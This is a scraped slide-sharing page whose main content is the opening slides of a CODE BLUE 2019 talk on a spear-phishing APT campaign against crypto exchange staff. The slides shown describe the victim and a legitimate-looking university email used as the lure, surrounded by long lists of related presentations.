Hacking TYPO3 v9 (T3DD19 edition)Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Oliver Hader
 
Cybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryCybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryAmmar WK
 
Cap Tech Talks Webinar April=l 2020 business email cybersecurity
Cap Tech Talks Webinar April=l 2020 business email cybersecurity Cap Tech Talks Webinar April=l 2020 business email cybersecurity
Cap Tech Talks Webinar April=l 2020 business email cybersecurity Bill Gibbs
 
Creating New Models To Combat Business Email Compromise
Creating New Models To Combat Business Email CompromiseCreating New Models To Combat Business Email Compromise
Creating New Models To Combat Business Email CompromisePriyanka Aash
 
INSECURE Magazine - 33
INSECURE Magazine - 33INSECURE Magazine - 33
INSECURE Magazine - 33Felipe Prado
 
DefCamp 2013 - Peering in the Soul of Hackers: HPP V2.0 reloaded
DefCamp 2013 - Peering in the Soul of Hackers:  HPP V2.0 reloadedDefCamp 2013 - Peering in the Soul of Hackers:  HPP V2.0 reloaded
DefCamp 2013 - Peering in the Soul of Hackers: HPP V2.0 reloadedDefCamp
 
Linkedin St Hubert Presentation 2019
Linkedin St Hubert Presentation 2019Linkedin St Hubert Presentation 2019
Linkedin St Hubert Presentation 2019Denis Curtin
 
Technology ComputerCrime presentation.pptx
Technology ComputerCrime presentation.pptxTechnology ComputerCrime presentation.pptx
Technology ComputerCrime presentation.pptxjohnmarklagarto1
 
Technically Compliant: the best kind of compliant
Technically Compliant: the best kind of compliantTechnically Compliant: the best kind of compliant
Technically Compliant: the best kind of compliantEmilyGladstoneCole
 
Breakfast Briefings - February 2018
Breakfast Briefings - February 2018Breakfast Briefings - February 2018
Breakfast Briefings - February 2018PKF Francis Clark
 

Similaire à [CB19] Recent APT attack on crypto exchange employees by Heungsoo Kang (20)

Anatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing AttackAnatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing Attack
 
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
 
LinkedIn (St. John) Presentation 2019
LinkedIn (St. John) Presentation 2019LinkedIn (St. John) Presentation 2019
LinkedIn (St. John) Presentation 2019
 
Anatomy of a spear phishing attack
Anatomy of a spear phishing attackAnatomy of a spear phishing attack
Anatomy of a spear phishing attack
 
Discretion in APT
Discretion in APTDiscretion in APT
Discretion in APT
 
Seminar on Phishing Protection
Seminar on Phishing ProtectionSeminar on Phishing Protection
Seminar on Phishing Protection
 
Social Engineering and other Foes in the GDPR Year
Social Engineering and other Foes in the GDPR YearSocial Engineering and other Foes in the GDPR Year
Social Engineering and other Foes in the GDPR Year
 
Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)
 
HackCon - SPF
HackCon - SPFHackCon - SPF
HackCon - SPF
 
Cybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industryCybercrime: A threat to Financial industry
Cybercrime: A threat to Financial industry
 
Cap Tech Talks Webinar April=l 2020 business email cybersecurity
Cap Tech Talks Webinar April=l 2020 business email cybersecurity Cap Tech Talks Webinar April=l 2020 business email cybersecurity
Cap Tech Talks Webinar April=l 2020 business email cybersecurity
 
Creating New Models To Combat Business Email Compromise
Creating New Models To Combat Business Email CompromiseCreating New Models To Combat Business Email Compromise
Creating New Models To Combat Business Email Compromise
 
INSECURE Magazine - 33
INSECURE Magazine - 33INSECURE Magazine - 33
INSECURE Magazine - 33
 
DefCamp 2013 - Peering in the Soul of Hackers: HPP V2.0 reloaded
DefCamp 2013 - Peering in the Soul of Hackers:  HPP V2.0 reloadedDefCamp 2013 - Peering in the Soul of Hackers:  HPP V2.0 reloaded
DefCamp 2013 - Peering in the Soul of Hackers: HPP V2.0 reloaded
 
Linkedin St Hubert Presentation 2019
Linkedin St Hubert Presentation 2019Linkedin St Hubert Presentation 2019
Linkedin St Hubert Presentation 2019
 
Technology ComputerCrime presentation.pptx
Technology ComputerCrime presentation.pptxTechnology ComputerCrime presentation.pptx
Technology ComputerCrime presentation.pptx
 
Technically Compliant: the best kind of compliant
Technically Compliant: the best kind of compliantTechnically Compliant: the best kind of compliant
Technically Compliant: the best kind of compliant
 
Hacking TYPO3 v9
Hacking TYPO3 v9Hacking TYPO3 v9
Hacking TYPO3 v9
 
Breakfast Briefings - February 2018
Breakfast Briefings - February 2018Breakfast Briefings - February 2018
Breakfast Briefings - February 2018
 
CyberDen 2020
CyberDen 2020CyberDen 2020
CyberDen 2020
 

Plus de CODE BLUE

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo PupilloCODE BLUE
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

Plus de CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Dernier

Chizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck.  .pptxChizaram's Women Tech Makers Deck.  .pptx
Chizaram's Women Tech Makers Deck. .pptxogubuikealex
 
miladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxmiladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxCarrieButtitta
 
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.KathleenAnnCordero2
 
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSimulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSebastiano Panichella
 
The Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationThe Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationNathan Young
 
Genshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxGenshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxJohnree4
 
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comSaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comsaastr
 
Engaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptxEngaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptxAsifArshad8
 
Quality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for  RA (1ST SEMQuality by design.. ppt for  RA (1ST SEM
Quality by design.. ppt for RA (1ST SEMCharmi13
 
SBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSebastiano Panichella
 
Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸mathanramanathan2005
 
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power
 
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRachelAnnTenibroAmaz
 
Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Escort Service
 
The 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringThe 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringSebastiano Panichella
 
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...Henrik Hanke
 
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRRINDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRRsarwankumar4524
 
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC  - NANOTECHNOLOGYPHYSICS PROJECT BY MSC  - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGYpruthirajnayak525
 
Work Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxWork Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxmavinoikein
 
Early Modern Spain. All about this period
Early Modern Spain. All about this periodEarly Modern Spain. All about this period
Early Modern Spain. All about this periodSaraIsabelJimenez
 

Dernier (20)

Chizaram's Women Tech Makers Deck. .pptx
Chizaram's Women Tech Makers Deck.  .pptxChizaram's Women Tech Makers Deck.  .pptx
Chizaram's Women Tech Makers Deck. .pptx
 
miladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptxmiladyskindiseases-200705210221 2.!!pptx
miladyskindiseases-200705210221 2.!!pptx
 
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
PAG-UNLAD NG EKONOMIYA na dapat isaalang alang sa pag-aaral.
 
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with AerialistSimulation-based Testing of Unmanned Aerial Vehicles with Aerialist
Simulation-based Testing of Unmanned Aerial Vehicles with Aerialist
 
The Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism PresentationThe Ten Facts About People With Autism Presentation
The Ten Facts About People With Autism Presentation
 
Genshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptxGenshin Impact PPT Template by EaTemp.pptx
Genshin Impact PPT Template by EaTemp.pptx
 
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.comSaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
SaaStr Workshop Wednesday w/ Kyle Norton, Owner.com
 
Engaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptxEngaging Eid Ul Fitr Presentation for Kindergartners.pptx
Engaging Eid Ul Fitr Presentation for Kindergartners.pptx
 
Quality by design.. ppt for RA (1ST SEM
Quality by design.. ppt for  RA (1ST SEMQuality by design.. ppt for  RA (1ST SEM
Quality by design.. ppt for RA (1ST SEM
 
SBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation TrackSBFT Tool Competition 2024 -- Python Test Case Generation Track
SBFT Tool Competition 2024 -- Python Test Case Generation Track
 
Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸Mathan flower ppt.pptx slide orchids ✨🌸
Mathan flower ppt.pptx slide orchids ✨🌸
 
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular PlasticsDutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
Dutch Power - 26 maart 2024 - Henk Kras - Circular Plastics
 
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATIONRACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
RACHEL-ANN M. TENIBRO PRODUCT RESEARCH PRESENTATION
 
Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170Call Girls In Aerocity 🤳 Call Us +919599264170
Call Girls In Aerocity 🤳 Call Us +919599264170
 
The 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software EngineeringThe 3rd Intl. Workshop on NL-based Software Engineering
The 3rd Intl. Workshop on NL-based Software Engineering
 
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
DGT @ CTAC 2024 Valencia: Most crucial invest to digitalisation_Sven Zoelle_v...
 
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRRINDIAN GCP GUIDELINE. for Regulatory  affair 1st sem CRR
INDIAN GCP GUIDELINE. for Regulatory affair 1st sem CRR
 
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC  - NANOTECHNOLOGYPHYSICS PROJECT BY MSC  - NANOTECHNOLOGY
PHYSICS PROJECT BY MSC - NANOTECHNOLOGY
 
Work Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptxWork Remotely with Confluence ACE 2.pptx
Work Remotely with Confluence ACE 2.pptx
 
Early Modern Spain. All about this period
Early Modern Spain. All about this periodEarly Modern Spain. All about this period
Early Modern Spain. All about this period
 

[CB19] Recent APT attack on crypto exchange employees by Heungsoo Kang

  • 1. CODE BLUE 2019 @TOKYO H e u n g s o o K a n g , L I N E DISCRETION IN APT
 Recent attack on crypto exchange services
  • 2. CODE BLUE 2019 @TOKYO $ whoami - Heungsoo Kang (David) - - Mobile messenger loved in Asia - Lots of services - Also Crypto/FIAT exchange BITBOX / BITMAX - We care security very much! - Contact - cmpdebugger@gmail.com / @jz__ 2
  • 3. CODE BLUE 2019 @TOKYO 3 About this talk - Background - Coinbase announced it’s been attacked by a very sophisticated, highly targeted attack - Coinbase blog / Philip Martin (@SecurityGuyPhil) - Decent analysis by objective-see.com - Undisclosed, but LINE was also targeted
  • 4. CODE BLUE 2019 @TOKYO 4 - Background - Coinbase announced it’s been attacked by a very sophisticated, highly targeted attack - Coinbase blog / Philip Martin (@SecurityGuyPhil) - Decent analysis by objective-see.com - Undisclosed, but LINE was also targeted About this talk
  • 5. CODE BLUE 2019 @TOKYO About this talk - Goal of this talk - To share the perspectives of … - The victim (how it looked like to him) - The attackers (what they had prepared) - The blue-team (what we could/not see) - To share information about … - Its malware - Attackers 5
  • 6. CODE BLUE 2019 @TOKYO About this talk - Goal of this talk - To share the perspectives of … - The victim (how it looked like to him) - The attackers (what they had prepared) - The blue-team (what we could/not see) - To share information about … - Its malware - Attackers 6
  • 7. CODE BLUE 2019 @TOKYO Perspective 1: Victim 7 How it looked over the surface
  • 8. CODE BLUE 2019 @TOKYO About Victim - A talented developer - :~10 years of experience - Device - iPhone - MacBook Pro 8
  • 9. CODE BLUE 2019 @TOKYO Email Conversation - Victim receives an email through his personal account - sender - nm603@cam.ac.uk 9
  • 10. CODE BLUE 2019 @TOKYO Email Conversation - Victim receives an email through his personal account - sender - nm603@cam.ac.uk - Legit from cam.ac.uk 10 Passed SPF/DKIM/DMARC
  • 11. CODE BLUE 2019 @TOKYO Email Conversation - Victim receives an email through his personal account - sender - nm603@cam.ac.uk - Legit from cam.ac.uk - Link uses legit cam.ac.uk 11
  • 12. CODE BLUE 2019 @TOKYO Email Conversation - Victim receives an email through his personal account - sender - nm603@cam.ac.uk - Legit from cam.ac.uk - Link uses legit cam.ac.uk - Adams Prize is 
 “Looking for field experts” 12
